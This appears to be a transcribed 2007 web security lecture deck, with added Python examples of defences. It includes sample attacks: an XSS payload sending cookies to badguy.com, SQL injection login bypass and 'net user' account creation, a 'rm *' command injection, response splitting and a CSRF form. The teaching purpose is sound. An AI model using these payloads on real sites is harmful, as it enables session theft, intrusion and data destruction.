Secure Web Site Design - PowerPoint PPT Presentation
1
Secure Web Site Design
CS 155
Spring 2007
  • Dan Boneh

Project 2 out today
2
Vulnerability Statistics: web is winning
Majority of vulnerabilities now found in web software
Source: MITRE CVE trends
3
Schematic web site architecture
(Diagram. Components shown: two firewalls, web servers WS1, WS2, WS3, Application Firewall (WAF), Load Balancer, App Servers, DB, IDS, and a link to the CC processor.)
4
Web Application Firewalls
  • Prevent some attacks we discuss today:
  • SQL Injection
  • Form field tampering
  • Cookie poisoning
  • Some examples:
  • Imperva
  • Kavado Interdo
  • F5 TrafficShield
  • Citrix NetScaler
  • CheckPoint Web Intelligence

5
Our focus: web app code
  • Common web-site attacks:
  • Denial of Service: later in course
  • Attack the web server (IIS, Apache):
  • e.g. control hijacking: CodeRed, Nimda, ...
  • Solutions:
  • Harden web server: stackguard, libsafe, ...
  • Worm defense: later in course.
  • Host based intrusion detection,
  • Worm signature generation, shields.
  • Today:
  • Common vulnerabilities in web application code

6
Web app code
  • Runs on web server or app server.
  • Takes input from web users (via web server)
  • Interacts with the database and 3rd parties.
  • Prepares results for users (via web server)
  • Examples:
  • Shopping carts, home banking, bill pay, tax prep, ...
  • New code written for every web site.
  • Written in:
  • C, PHP, Perl, Python, JSP, ASP, ...
  • Often written with little consideration for security.

7
Background
8
HTTP Request
(Annotations on the slide: Method, File, HTTP version, Headers, Blank line, Data)
  GET /default.asp HTTP/1.0
  Accept: image/gif, image/x-bitmap, image/jpeg, */*
  Accept-Language: en
  User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
  Connection: Keep-Alive
  If-Modified-Since: Sunday, 17-Apr-96 04:32:58 GMT

Blank line
Data: none for GET
GET: no side effect. POST: possible side effect.
9
HTTP Response
(Annotations on the slide: HTTP version, Status code, Reason phrase, Headers, Data)
  HTTP/1.0 200 OK
  Date: Sun, 21 Apr 1996 02:20:42 GMT
  Server: Microsoft-Internet-Information-Server/5.0
  Connection: keep-alive
  Content-Type: text/html
  Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
  Content-Length: 2543

  <HTML> Some data... blah, blah, blah </HTML>
10
Document Object Model (DOM)
  • Object-oriented interface used to read and write docs:
  • web page in HTML is structured data
  • DOM provides representation of this hierarchy
  • Examples:
  • Properties: document.alinkColor, document.URL, document.forms[], document.links[], document.anchors[]
  • Methods: document.write(document.referrer)
  • Also Browser Object Model (BOM):
  • Window, Document, Frames[], History, Location, Navigator (type and version of browser)

11
Cookies
  • Used to store state on user's machine

(Diagram)
Browser → Server: GET ...
Server → Browser: HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL)
Browser → Server: GET ... Cookie: NAME = VALUE
HTTP is a stateless protocol; cookies add state
12
Cookies
  • Browser will store:
  • At most 20 cookies/site, 3 KB / cookie
  • Uses:
  • User authentication
  • Personalization
  • User tracking: e.g. Doubleclick (3rd party cookies)

13
Browser Same Origin Principle
  • Web sites from different domains cannot interact except in very limited ways. Applies to:
  • Cookies: cookie from origin A not visible to origin B
  • Properties: script from origin A cannot read or set properties for origin B
  • Two origins are the same iff:
  • Domain-name, port, and protocol are equal
  • https://www.example.com:443/whoami
  • http://www.example.com:443/hello
  • Note: setting document.domain changes origin.
  • Can only be set to suffix of domain name.
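The origin rule above is short but easy to get subtly wrong (default ports, case of host names, the document.domain suffix restriction). The following Python is an added example, not code from the slides; it compares origins the way the slide defines them, with the default ports for http and https filled in (an assumption of this example; other schemes are not handled), and checks the document.domain suffix rule.

```python
from urllib.parse import urlsplit

# Default ports so "http://a.com/" and "http://a.com:80/" compare equal.
# Assumption of this example: only http and https are considered.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url: str) -> tuple:
    """Return the (scheme, host, port) triple that defines a URL's origin.
    Path, query and fragment deliberately play no part."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(url_a: str, url_b: str) -> bool:
    """Two URLs share an origin iff scheme, host and port all match."""
    return origin(url_a) == origin(url_b)


def can_set_document_domain(current_host: str, new_value: str) -> bool:
    """document.domain may only be set to a dotted suffix of the current host.
    Setting it to a bare top-level label such as "com" is refused, as browsers do."""
    current = current_host.lower()
    new = new_value.lower()
    if new == current:
        return True
    if "." not in new:
        return False
    return current.endswith("." + new)


if __name__ == "__main__":
    # The two URLs from the slide differ in protocol, so they are different origins.
    print(same_origin("https://www.example.com:443/whoami",
                      "http://www.example.com:443/hello"))   # False
    print(can_set_document_domain("www.example.com", "example.com"))  # True
```

The host name is lower-cased before comparison and the port is normalised; forgetting either produces origin checks that reject or accept URLs inconsistently with what the browser will do.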

14
SOP Examples
  • Example HTML at www.site.com
  • Disallowed access:
  • <iframe src="http://othersite.com"></iframe>
  • alert( frames[0].contentDocument.body.innerHTML )
  • alert( frames[0].src )
  • Allowed access:
  • <img src="http://othersite.com/logo.gif">
  • alert( images[0].height )
  • Note: SOP allows send-only communication with othersite

15
Web Application Vulnerabilities
16
Common vulnerabilities (OWASP)
  • Inadequate validation of user input:
  • Cross site scripting
  • SQL Injection
  • HTTP Splitting
  • Broken session management:
  • Can lead to session hijacking and data theft
  • Insecure storage:
  • Sensitive data stored in the clear.
  • Prime target for theft: e.g. egghead, Verizon.
  • Note: PCI Data Security Standard (Visa, Mastercard)

17
Warm up: a simple example
  • Direct use of user input:
  • http://victim.com/copy.php?name=username
  • copy.php:
  • Problem:
  • http://victim.com/copy.php?name=a ; rm *
  • (should be name=a%20;%20rm%20* )

18
Redirects
  • EZShopper.com shopping cart (10/2004)
  • http://.../cgi-bin/loadpage.cgi?page=url
  • Redirects browser to url
  • Redirects are common on many sites:
  • Used to track when user clicks on external link
  • EZShopper uses redirect to add HTTP headers
  • Problem: phishing
  • http://victim.com/cgi-bin/loadpage?page=phisher.com
  • Link to victim.com puts user at phisher.com
  • ⇒ Local redirects should ensure target URL is local
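"Ensure the target URL is local" hides a few traps: protocol-relative targets ("//phisher.com"), backslash variants, and non-http schemes all leave the site even though they do not start with "http://". The following Python is an added example, not code from the slides or from EZShopper; it assumes the redirecting site is http://victim.com (the placeholder host from the slide) and accepts only absolute paths on that site or absolute URLs with the same origin.

```python
from urllib.parse import urlsplit, urljoin

# The site that issues the redirect; the host name is the slide's placeholder.
SITE = "http://victim.com"


def _origin(url: str):
    """(scheme, host, port) with the default port filled in; None if unparsable."""
    try:
        p = urlsplit(url)
        port = p.port
    except ValueError:
        return None
    scheme = p.scheme.lower()
    default = {"http": 80, "https": 443}.get(scheme)
    return (scheme, (p.hostname or "").lower(), port if port is not None else default)


def is_local_redirect(target: str) -> bool:
    """True only if following `target` keeps the browser on SITE.

    Accepted: a path beginning with exactly one '/', or an absolute URL whose
    origin equals SITE's. Rejected: other hosts, protocol-relative '//host',
    the '/\\host' variant some browsers treat the same way, bare names such as
    'phisher.com' (ambiguous), non-http schemes, and control characters."""
    if not target or any(c in target for c in "\r\n\t "):
        return False
    if target.startswith("//") or target.startswith("/\\"):
        return False
    if target.startswith("/"):
        return True
    try:
        p = urlsplit(target)
    except ValueError:
        return False
    if p.scheme == "" and p.netloc == "":
        return False
    return _origin(target) is not None and _origin(target) == _origin(SITE)


def safe_redirect_target(target: str, fallback: str = "/") -> str:
    """Resolve the redirect target against SITE, falling back to a known-safe page."""
    return urljoin(SITE, target if is_local_redirect(target) else fallback)


if __name__ == "__main__":
    for t in ["/cart", "http://victim.com/cart", "phisher.com",
              "http://phisher.com", "//phisher.com", "javascript:alert(1)"]:
        print(f"{t!r:28} -> {safe_redirect_target(t)}")
```

The allow-list shape (what is accepted is spelled out, everything else falls back) is the point: a deny-list of "http://" prefixes would miss every variant in the test below.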

19
Cross Site Scripting (XSS)
20
The setup
  • User input is echoed into HTML response.
  • Example: search field
  • http://victim.com/search.php?term=apple
  • search.php responds with:
  • <HTML> <TITLE> Search Results </TITLE>
  • <BODY>
  • Results for <?php echo $_GET[term] ?> :
  • . . .
  • </BODY> </HTML>
  • Is this exploitable?

21
Bad input
  • Problem: no validation of input term
  • Consider link: (properly URL encoded)
  • http://victim.com/search.php?term=
  •   <script> window.open(
  •     "http://badguy.com?cookie = " +
  •     document.cookie ) </script>
  • What if user clicks on this link?
  • Browser goes to victim.com/search.php
  • Victim.com returns
  • <HTML> Results for <script> ... </script>
  • Browser executes script
  • Sends badguy.com cookie for victim.com

22
So what?
  • Why would user click on such a link?
  • Phishing email in webmail client (e.g. gmail).
  • Link in doubleclick banner ad
  • ... many many ways to fool user into clicking
  • What if badguy.com gets cookie for victim.com?
  • Cookie can include session auth for victim.com
  • Or other data intended only for victim.com
  • Violates same origin policy

23
Much worse...
  • Attacker can execute arbitrary scripts in browser
  • Can manipulate any DOM component on victim.com
  • Control links on page
  • Control form fields (e.g. password field) on this page and linked pages.
  • Example: inject password field that sends password to bad guy.
  • Can infect other users: MySpace.com worm.

24
MySpace.com (Samy worm)
  • Users can post HTML on their pages
  • MySpace.com ensures HTML contains no
  • <script>, <body>, onclick, <a href=javascript://>
  • ... but can do Javascript within CSS tags:
  • <div style="background:url('javascript:alert(1)')">
  • And can hide "javascript" as "java\nscript"
  • With careful javascript hacking:
  • Samy's worm infects anyone who visits an infected MySpace page and adds Samy as a friend.
  • Samy had millions of friends within 24 hours.
  • More info: http://namb.la/popular/tech.html

25
Avoiding XSS bugs (PHP)
  • Main problem:
  • Input checking is difficult --- many ways to inject scripts into HTML.
  • Preprocess input from user before echoing it
  • PHP: htmlspecialchars(string)
  • & → &amp;   " → &quot;   ' → &#039;   < → &lt;   > → &gt;
  • htmlspecialchars( "<a href='test'>Test</a>", ENT_QUOTES)
  • Outputs: &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
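To make the output-escaping fix concrete, here is an added Python example (not code from the slides or from PHP): a stand-in for htmlspecialchars() with ENT_QUOTES that reproduces the slide's five-character table, applied to the search.php page from the XSS setup, with the cookie-stealing link payload from the "Bad input" slide run through both the vulnerable and the escaped rendering. The page template and the helper names are constructed for this example.

```python
# A Python stand-in for PHP's htmlspecialchars($s, ENT_QUOTES): the five
# characters with HTML meaning become entities, nothing else is touched.
# The table reproduces the slide's mapping (PHP emits &#039; for the single quote).
_HTML_ESCAPES = {"&": "&amp;", '"': "&quot;", "'": "&#039;", "<": "&lt;", ">": "&gt;"}


def htmlspecialchars(s: str) -> str:
    # One pass with one lookup per character, so '&' is never escaped twice.
    return "".join(_HTML_ESCAPES.get(ch, ch) for ch in s)


# The search.php page from the slide, as a template (constructed here).
SEARCH_PAGE = ("<HTML> <TITLE> Search Results </TITLE>\n<BODY>\n"
               "Results for {term} :\n. . .\n</BODY> </HTML>")


def render_search_vulnerable(term: str) -> str:
    """Echoes the parameter straight into the HTML body, as the slide's PHP does."""
    return SEARCH_PAGE.format(term=term)


def render_search_safe(term: str) -> str:
    """Escapes the parameter first, so the browser sees text, never markup."""
    return SEARCH_PAGE.format(term=htmlspecialchars(term))


# The link payload from the "Bad input" slide, URL-decoded.
PAYLOAD = '<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>'


def page_contains_script(page: str) -> bool:
    """Crude check, used only to show the difference: does a <script> tag survive?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))   # script tag reaches the browser
    print(render_search_safe(PAYLOAD))         # &lt;script&gt; ... rendered as text
```

One caveat the MySpace slide makes obvious: this escaping is correct for text placed in the HTML body or in a quoted attribute. Data placed inside a style attribute, a URL, or a script block needs the escaping rules of that context; htmlspecialchars() alone does not neutralise the CSS url('javascript:...') trick.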

26
Avoiding XSS bugs (ASP.NET)
  • ASP.NET 1.1:
  • Server.HtmlEncode(string)
  • Similar to PHP htmlspecialchars
  • validateRequest: (on by default)
  • Crashes page if finds <script> in POST data.
  • Looks for hardcoded list of patterns.
  • Can be disabled:
  • <%@ Page validateRequest="false" %>

28
httpOnly Cookies (IE)
(Diagram)
Browser → Server: GET ...
Server → Browser: HTTP Header: Set-cookie: NAME=VALUE ; HttpOnly
  • Cookie sent over HTTP(s), but not accessible to scripts:
  • cannot be read via document.cookie
  • Helps prevent cookie theft via XSS
  • ... but does not stop most other risks of XSS bugs.

29
SQL Injection
30
The setup
  • User input is used in SQL query
  • Example: login page (ASP)
  • set ok = execute( "SELECT * FROM UserTable
  •    WHERE username=' " & form("user") & " '
  •    AND password=' " & form("pwd") & " ' " );
  • If not ok.EOF
  •    login success
  • else fail;
  • Is this exploitable?

31
Bad input
  • Suppose user = " ' or 1 = 1 -- " (URL encoded)
  • Then script does:
  • ok = execute( SELECT ...
  •    WHERE username= ' ' or 1=1 -- ... )
  • The "--" causes rest of line to be ignored.
  • Now ok.EOF is always false.
  • The bad news: easy login to many sites this way.

32
Even worse
  • Suppose user =
  • " ' ; exec cmdshell
  • 'net user badguy badpwd' / ADD -- "
  • Then script does:
  • ok = execute( SELECT ...
  •    WHERE username= ' ' ; exec ... )
  • If SQL server context runs as sa, attacker gets account on DB server.

33
Avoiding SQL injection
  • Build SQL queries by properly escaping args: ' → \'
  • Example: Parameterized SQL (ASP.NET 1.1)
  • Ensures SQL arguments are properly escaped.
  • SqlCommand cmd = new SqlCommand(
       "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd", dbConnection);
  • cmd.Parameters.Add("@User", Request["user"] );
  • cmd.Parameters.Add("@Pwd", Request["pwd"] );
  • cmd.ExecuteReader();
  • In PHP: bound parameters -- similar function

34
PHP addslashes()
  • PHP: addslashes( " ' or 1 = 1 -- " )
  • outputs: " \' or 1=1 -- "
  • Unicode attack: (GBK)
  • user = 0x bf 27
  • addslashes(user) → 0x bf 5c 27 → a single two-byte GBK character followed by an unescaped '
  • Correct implementation: mysql_real_escape_string()
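The two preceding slides (parameterized queries, and why addslashes() is not enough) can be demonstrated together. The following Python is an added example, not code from the slides; it uses the standard sqlite3 module in place of the ASP/SQL Server and PHP/MySQL setups on the slides, with a constructed one-row UserTable. It shows the concatenated login query accepting the slide's " ' or 1 = 1 -- " input while the parameterized version rejects it, and reimplements addslashes() byte-for-byte to show that the escaped 0xbf 0x5c 0x27 sequence, read as GBK, still delivers a bare quote.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory UserTable with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    conn.execute("INSERT INTO UserTable VALUES ('alice', 'correct-horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    # String concatenation, the pattern of the ASP snippet on the slide:
    # whatever the user typed becomes part of the SQL text.
    query = ("SELECT * FROM UserTable WHERE username='" + user +
             "' AND password='" + pwd + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    # Bound parameters: the driver ships user/pwd as data, so a quote in them
    # can never terminate the string literal or start a comment.
    query = "SELECT * FROM UserTable WHERE username=? AND password=?"
    return conn.execute(query, (user, pwd)).fetchone() is not None


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping the way PHP's addslashes() works: a backslash before
    ' " \\ and NUL. It knows nothing about the character set of the bytes."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives_gbk(user: bytes) -> bool:
    """Escape with addslashes(), then decode as GBK, as a GBK-configured MySQL
    would. True means an unescaped quote reached the SQL parser: 0xbf swallows
    the inserted 0x5c as the second byte of a two-byte character."""
    text = addslashes(user).decode("gbk", errors="replace")
    return "'" in text and "\\'" not in text


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1 --", "anything"))       # True: logged in
    print(login_parameterized(db, "' or 1=1 --", "anything"))    # False
    print(addslashes(b"\xbf\x27").hex(), quote_survives_gbk(b"\xbf\x27"))  # bf5c27 True
```

The second half is why the slide points to mysql_real_escape_string(): an escaping routine has to know the connection's character set to escape correctly, and bound parameters avoid the question entirely.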

35
HTTP Response Splitting
36
The setup
  • User input echoed in HTTP header.
  • Example: Language redirect page (JSP)
  • <% response.redirect("/by_lang.jsp?lang=" + request.getParameter("lang") ) %>
  • Browser sends: http://.../by_lang.jsp?lang=french
  • Server HTTP Response:
  • HTTP/1.1 302 (redirect)
  • Date: ...
  • Location: /by_lang.jsp?lang=french
  • Is this exploitable?

37
Bad input
  • Suppose browser sends:
  • http://.../by_lang.jsp?lang=
  •   french \n
  •   Content-length: 0 \r\n\r\n
  •   HTTP/1.1 200 OK
  •   Spoofed page        (URL encoded)

38
Bad input
  • HTTP response from server looks like:
  • HTTP/1.1 302 (redirect)
  • Date: ...
  • Location: /by_lang.jsp?lang=french
  • Content-length: 0
  •
  • HTTP/1.1 200 OK
  • Content-length: 217
  •
  • Spoofed page
  • (everything from "french" onward is the value of the lang parameter)
39
So what?
  • What just happened:
  • Attacker submitted bad URL to victim.com
  • URL contained spoofed page in it
  • Got back spoofed page
  • So what?
  • Cache servers along path now store spoof of victim.com
  • Will fool any user using same cache server
  • Defense: don't do that.
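"Don't do that" in practice means: never let CR or LF from a request reach a header. The following Python is an added example, not code from the slides; it builds the by_lang.jsp redirect both the vulnerable way and the hardened way (percent-encoding the value, then refusing any header that still contains CR/LF), and feeds each response to a small parser that reads a byte stream the way a cache or proxy does (status line, headers, blank line, Content-Length bytes). The spoofed body and the Date header value are constructed for this example; the response format follows the HTTP Request/Response background slides.

```python
from urllib.parse import quote

DATE = "Date: Sun, 21 Apr 1996 02:20:42 GMT"   # constructed; the slide shows "Date: ..."


def build_redirect_vulnerable(lang: str) -> bytes:
    """Mirrors the JSP on the slide: the parameter is pasted straight into Location."""
    return (f"HTTP/1.1 302 Found\r\n{DATE}\r\n"
            f"Location: /by_lang.jsp?lang={lang}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def build_redirect_safe(lang: str) -> bytes:
    """Percent-encode the value before it enters a header, then refuse to emit
    any header that still contains CR or LF (defence in depth)."""
    value = quote(lang, safe="")           # "\r\n" becomes "%0D%0A"
    location = f"/by_lang.jsp?lang={value}"
    if "\r" in location or "\n" in location:
        raise ValueError("header value contains CR/LF")
    return (f"HTTP/1.1 302 Found\r\n{DATE}\r\n"
            f"Location: {location}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def split_responses(raw: bytes) -> list:
    """Parse a byte stream as a sequence of HTTP responses: status line,
    headers, blank line, then exactly Content-Length body bytes; repeat until
    the data runs out. Returns [(status_line, headers, body), ...]."""
    responses, pos = [], 0
    while True:
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break                          # not a status line: stop parsing
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        responses.append((lines[0], headers, raw[body_start:body_start + length]))
        pos = body_start + length
    return responses


# The attack string from the slide, constructed here with a concrete body.
SPOOF_BODY = b"<html>Spoofed page</html>"
INJECTED_LANG = ("french\r\nContent-Length: 0\r\n\r\n"
                 "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 f"Content-Length: {len(SPOOF_BODY)}\r\n\r\n" + SPOOF_BODY.decode("latin-1"))


if __name__ == "__main__":
    for name, builder in [("vulnerable", build_redirect_vulnerable), ("safe", build_redirect_safe)]:
        parsed = split_responses(builder(INJECTED_LANG))
        print(name, "->", len(parsed), "response(s):", [r[0] for r in parsed])
```

With the vulnerable builder the parser sees two responses, and the second one (the attacker's 200 with the spoofed body) is what a shared cache would store under the URL it was requested with; the safe builder yields a single 302 whose Location merely contains "%0D%0A".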

40
Summary thus far
41
App code
  • Little programming knowledge can be dangerous:
  • Cross site scripting
  • SQL Injection
  • HTTP Splitting
  • What to do?
  • Band-aid: Web App Firewall (WAF)
  • Looks for attack patterns and blocks requests
  • False positives / false negatives
  • Code checking

42
Code checking
  • Blackbox security testing services:
  • Whitehatsec.com
  • Automated blackbox testing tools:
  • Cenzic, Hailstorm
  • Spidynamic, WebInspect
  • eEye, Retina
  • Web application hardening tools:
  • WebSSARI [WWW'04]: based on information flow
  • Nguyen-Tuong [IFIP'05]: based on tainting

43
Session Management
  • Cookies, hidden fields, and user authentication

44
Cookies
  • Used to store state on user's machine

(Diagram)
Browser → Server: GET ...
Server → Browser: HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL)
Browser → Server: GET ... Cookie: NAME = VALUE
HTTP is a stateless protocol; cookies add state
45
Cookie risks
  • Danger of storing data on browser:
  • User can change values
  • Silly example: Shopping cart software.
  • Set-cookie: shopping-cart-total = 150 ($)
  • User edits cookie file (cookie poisoning):
  • Cookie: shopping-cart-total = 15 ($)
  • bargain shopping.
  • Similar behavior with hidden fields:
  • <INPUT TYPE="hidden" NAME=price VALUE="150">

46
Not so silly (as of 2/2005)
  • D3.COM Pty Ltd: ShopFactory 5.8
  • @Retail Corporation: @Retail
  • Adgrafix: Check It Out
  • Baron Consulting Group: WebSite Tool
  • ComCity Corporation: SalesCart
  • Crested Butte Software: EasyCart
  • Dansie.net: Dansie Shopping Cart
  • Intelligent Vending Systems: Intellivend
  • Make-a-Store: Make-a-Store OrderPage
  • McMurtrey/Whitaker & Associates: Cart32 3.0
  • pknutsen@nethut.no: CartMan 1.04
  • Rich Media Technologies: JustAddCommerce 5.0
  • SmartCart: SmartCart
  • Web Express: Shoptron 1.2
  • Source: http://xforce.iss.net/xforce/xfdb/4621

47
Example: dansie.net shopping cart
  • http://www.dansie.net/demo.html (May, 2006)
  • <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
  • Black Leather purse with leather straps<BR>Price: $20.00<BR>
  • <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html"> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
  • <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
  • </FORM>
  • CVE-2000-0253 (Jan. 2001), BugTraq ID 1115

48
Solution
  • When storing state on browser: MAC data using server secret key.
  • .NET 2.0:
  • System.Web.Configuration.MachineKey
  • Secret web server key intended for cookie protection
  • HttpCookie cookie = new HttpCookie(name, val);
    HttpCookie encodedCookie = HttpSecureCookie.Encode(cookie);
  • HttpSecureCookie.Decode(cookie);
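What HttpSecureCookie.Encode/Decode do can be shown in a few lines. The following Python is an added example, not code from the slides or from .NET; it protects a cookie value with an HMAC under a server-side key (a constructed test key stands in for MachineKey), binds the tag to the cookie name so a tag cannot be moved between cookies, and emits the Set-Cookie line with the Secure and HttpOnly flags from the earlier slides. The shopping-cart-total value is the one from the cookie poisoning slide.

```python
import hmac
import hashlib


def encode_cookie(name: str, value: str, key: bytes) -> str:
    """Append an HMAC over name and value. Anyone can still read the value
    (a MAC gives integrity, not secrecy); nobody without the key can change it.
    Stands in for HttpSecureCookie.Encode."""
    tag = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return f"{value}|{tag}"


def decode_cookie(name: str, raw: str, key: bytes):
    """Return the value if the tag verifies under this name and key, else None.
    Stands in for HttpSecureCookie.Decode."""
    value, sep, tag = raw.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison, so timing does not leak how many tag bytes matched.
    return value if hmac.compare_digest(expected, tag) else None


def set_cookie_header(name: str, value: str, key: bytes) -> str:
    """Set-Cookie line carrying the protected value plus the flags from the slides."""
    return f"Set-Cookie: {name}={encode_cookie(name, value, key)}; Secure; HttpOnly"


if __name__ == "__main__":
    KEY = b"constructed-demo-key-replace-with-MachineKey"
    print(set_cookie_header("shopping-cart-total", "150", KEY))
    stored = encode_cookie("shopping-cart-total", "150", KEY)
    edited = "15|" + stored.split("|")[1]          # the cookie-poisoning edit
    print(decode_cookie("shopping-cart-total", stored, KEY))   # 150
    print(decode_cookie("shopping-cart-total", edited, KEY))   # None: rejected
```

The server must treat a failed Decode as "no cookie at all" (recompute the cart from server-side data) rather than falling back to the raw value, otherwise the MAC buys nothing.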

49
Cookie authentication
(Diagram. Participants: Browser, Web Server, Auth server; label "Check val".)
50
Weak authenticators: security risk
  • Predictable cookie authenticator:
  • Verizon Wireless - counter
  • Valid user logs in, gets counter, can view sessions of other users.
  • Weak authenticator generation: [Fu et al. '01]
  • WSJ.com cookie = {user, MAC_K(user)}
  • Weak MAC exposes K from few cookies.
  • Apache Tomcat generateSessionID()
  • MD5(PRNG) but weak PRNG [GM'05].
  • Predictable SessionIDs

51
Cross Site Request Forgery
  • Example:
  • User logs in to bank.com. Forgets to sign off.
  • Session cookie remains in browser state
  • Then user visits another site containing:
  • <form name=F action=http://bank.com/BillPay.php>
  • <input name=recipient value=badguy>
  • <script> document.F.submit() </script>
  • Browser sends user auth cookie with request
  • Transaction will be fulfilled
  • Problem:
  • cookie auth is insufficient when side effects can happen
  • Correct use: use cookies + hidden fields
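"Cookies + hidden fields" means: the cookie says who the user is, and a hidden field that only bank.com's own pages can contain proves the form was bank.com's. The following Python is an added example, not code from the slides; it derives the hidden-field token from the session cookie with a server key (a constructed key stands in for the real one), renders the BillPay form with it, and shows the server handler accepting bank.com's form while rejecting the forged submission from the slide, which carries the cookie but cannot carry the token because the same origin policy stops the other site from reading bank.com's page.

```python
import hmac
import hashlib


def csrf_token(session_id: str, key: bytes) -> str:
    """Hidden-field token bound to the session cookie under a server key."""
    return hmac.new(key, b"csrf:" + session_id.encode(), hashlib.sha256).hexdigest()


def render_billpay_form(session_id: str, key: bytes) -> str:
    """bank.com's own form carries the token. A page on another origin cannot
    read this HTML (same origin policy), so it cannot reproduce the value."""
    return ('<form action="http://bank.com/BillPay.php" method="POST">'
            '<input name="recipient">'
            f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id, key)}">'
            '</form>')


def handle_billpay(cookies: dict, form: dict, key: bytes) -> str:
    """Server side of BillPay.php: the cookie proves who, the hidden field proves
    the request came from bank.com's own form. Return value is the status line."""
    session_id = cookies.get("session")
    if session_id is None:
        return "401 not logged in"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(session_id, key)):
        return "403 missing or invalid CSRF token"
    return f"200 paying {form.get('recipient')}"


if __name__ == "__main__":
    KEY = b"constructed-demo-key"
    cookies = {"session": "session-of-logged-in-user"}      # constructed cookie jar
    # The other site's auto-submitted form: browser attaches the cookie, no token.
    print(handle_billpay(cookies, {"recipient": "badguy"}, KEY))
    # bank.com's own form, token included.
    token = csrf_token(cookies["session"], KEY)
    print(handle_billpay(cookies, {"recipient": "alice", "csrf_token": token}, KEY))
```

Deriving the token from the session identifier means nothing extra has to be stored server-side, but it also means the token must be rotated when the session is; a token stored per session and compared with hmac.compare_digest works equally well.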

52
Take home message
  • On the web
  • Little programming knowledge can be a
    dangerous thing

53
THE END